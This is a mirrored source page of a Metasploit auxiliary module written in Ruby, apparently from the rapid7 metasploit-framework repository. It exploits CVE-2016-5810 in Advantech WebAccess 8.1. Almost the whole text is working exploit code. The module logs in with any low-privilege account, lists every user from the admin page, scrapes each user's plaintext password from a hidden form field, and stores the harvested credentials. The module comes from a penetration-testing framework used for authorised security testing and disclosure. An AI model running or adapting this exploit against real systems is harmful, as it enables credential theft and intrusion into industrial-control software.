Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/gather/advantech_webaccess_creds.rb
19715 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Auxiliary
7
include Msf::Exploit::Remote::HttpClient
8
9
def initialize(info = {})
10
super(
11
update_info(
12
info,
13
'Name' => "Advantech WebAccess 8.1 Post Authentication Credential Collector",
14
'Description' => %q{
15
This module allows you to log into Advantech WebAccess 8.1, and collect all of the credentials.
16
Although authentication is required, any level of user permission can exploit this vulnerability.
17
18
Note that 8.2 is not suitable for this.
19
},
20
'License' => MSF_LICENSE,
21
'Author' => [
22
'h00die', # Pointed out the obvious during a PR review for CVE-2017-5154
23
'sinn3r', # Metasploit module
24
],
25
'References' => [
26
['CVE', '2016-5810'],
27
['URL', 'https://github.com/rapid7/metasploit-framework/pull/7859#issuecomment-274305229']
28
],
29
'DisclosureDate' => '2017-01-21',
30
'Notes' => {
31
'Reliability' => UNKNOWN_RELIABILITY,
32
'Stability' => UNKNOWN_STABILITY,
33
'SideEffects' => UNKNOWN_SIDE_EFFECTS
34
}
35
)
36
)
37
38
register_options(
39
[
40
OptString.new('WEBACCESSUSER', [true, 'Username for Advantech WebAccess', 'admin']),
41
OptString.new('WEBACCESSPASS', [false, 'Password for Advantech WebAccess', '']),
42
OptString.new('TARGETURI', [true, 'The base path to Advantech WebAccess', '/']),
43
]
44
)
45
end
46
47
def do_login
48
vprint_status("Attempting to login as '#{datastore['WEBACCESSUSER']}:#{datastore['WEBACCESSPASS']}'")
49
50
uri = normalize_uri(target_uri.path, 'broadweb', 'user', 'signin.asp')
51
52
res = send_request_cgi({
53
'method' => 'POST',
54
'uri' => uri,
55
'vars_post' => {
56
'page' => '/',
57
'pos' => '',
58
'username' => datastore['WEBACCESSUSER'],
59
'password' => datastore['WEBACCESSPASS'],
60
'remMe' => '',
61
'submit1' => 'Login'
62
}
63
})
64
65
unless res
66
fail_with(Failure::Unknown, 'Connection timed out while trying to login')
67
end
68
69
if res.headers['Location'] && res.headers['Location'] == '/broadweb/bwproj.asp'
70
print_good("Logged in as #{datastore['WEBACCESSUSER']}")
71
report_cred(
72
user: datastore['WEBACCESSUSER'],
73
password: datastore['WEBACCESSPASS'],
74
status: Metasploit::Model::Login::Status::SUCCESSFUL
75
)
76
return res.get_cookies.scan(/(ASPSESSIONID\w+=\w+);/).flatten.first || ''
77
end
78
79
print_error("Unable to login as '#{datastore['WEBACCESSUSER']}:#{datastore['WEBACCESSPASS']}'")
80
81
nil
82
end
83
84
def get_user_cred_detail(sid, user)
85
vprint_status("Gathering password for user: #{user}")
86
87
uri = normalize_uri(target_uri.path, 'broadWeb', 'user', 'upAdminPg.asp')
88
89
res = send_request_cgi({
90
'method' => 'GET',
91
'uri' => uri,
92
'cookie' => sid,
93
'vars_get' => {
94
'uname' => user
95
}
96
})
97
98
unless res
99
print_error("Unable to gather password for user #{user} due to a connection timeout")
100
return nil
101
end
102
103
html = res.get_html_document
104
pass_field = html.at('input[@name="Password"]')
105
106
pass_field ? pass_field.attributes['value'].text : nil
107
end
108
109
def get_users_page(sid)
110
vprint_status("Checking user page...")
111
112
uri = normalize_uri(target_uri.path, 'broadWeb', 'user', 'AdminPg.asp')
113
114
res = send_request_cgi({
115
'method' => 'GET',
116
'uri' => uri,
117
'cookie' => sid
118
})
119
120
unless res
121
fail_with(Failure::Unknown, 'Connection timed out while checking AdminPg.asp')
122
end
123
124
html = res.get_html_document
125
126
users = html.search('a').map { |a|
127
Rex::Text.uri_decode(a.attributes['href'].text.scan(/broadWeb\/user\/upAdminPg\.asp\?uname=(.+)/).flatten.first || '')
128
}.delete_if { |user| user.blank? }
129
130
users
131
end
132
133
def report_cred(opts)
134
service_data = {
135
address: rhost,
136
port: rport,
137
service_name: 'webaccess',
138
protocol: 'tcp',
139
workspace_id: myworkspace_id
140
}
141
142
credential_data = {
143
origin_type: :service,
144
module_fullname: fullname,
145
username: opts[:user],
146
private_data: opts[:password],
147
private_type: :password
148
}.merge(service_data)
149
150
login_data = {
151
last_attempted_at: DateTime.now,
152
core: create_credential(credential_data),
153
status: opts[:status],
154
proof: opts[:proof]
155
}.merge(service_data)
156
157
create_credential_login(login_data)
158
end
159
160
def run
161
cookie = do_login
162
users = get_users_page(cookie)
163
164
users.each do |user|
165
pass = get_user_cred_detail(cookie, user)
166
167
if pass
168
report_cred(
169
user: user,
170
password: pass,
171
status: Metasploit::Model::Login::Status::SUCCESSFUL,
172
proof: 'AdminPg.asp'
173
)
174
175
print_good("Found password: #{user}:#{pass}")
176
end
177
end
178
end
179
end
180
181